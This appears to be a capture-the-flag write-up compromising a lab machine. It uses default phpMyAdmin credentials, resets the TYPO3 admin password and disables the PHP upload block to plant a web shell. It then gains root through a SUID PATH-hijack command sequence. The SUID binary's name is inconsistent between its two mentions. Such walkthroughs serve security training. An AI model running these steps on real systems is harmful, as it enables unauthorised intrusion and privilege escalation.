We start by scanning the host with nmap –A –T4 –p- 192.168.1.11 –vv

Using dirb on port 80 and port 8081 came with a results:

On page http://192.168.1.11/phpmyadmin/index.php we got the main login page where we can use root:root to access the page and take a look:

We got 2 users on the TYPO3 database one of them is the admin:

We can change the password of the admin but we cannot crack it as it’s an Argon2, searching google we got a website that we can use to make our password with:

Now let’s change the admin password with the one we generated it:

Visit the link http://192.168.1.11/typo3/index.php and login as admin and the password hacker:


I tried to upload a shell.php file but the site is configures to not upload any php file, so what we need to do is to go to Settings and then click on Configure Installation-Wide Options, in the search just write php and then from the [BE][fileDenyPattern] delete the line \.(php[3-8]?|phpsh|phtml|pht|phar|shtml|cgi)(\..*)?$|\.pl$|^\.htaccess$

Next we go to Filelist and upload our shell.php file, I’ve uploaded it to the user folder:

Now open up the file to get a shell back, make sure your machine is ready with a listening port:

Now i tried to exploit the kernel and the system but no exploit on the run, running the command find / -perm -u=s -type f 2>/dev/null got a file apache2-restart

We going to abuse this file:

cd /tmp
echo “/bin/bash” > service
chmod +x service
export PATH=/tmp/:$PATH
apache-service2

Now we root so let’s catch the flag:
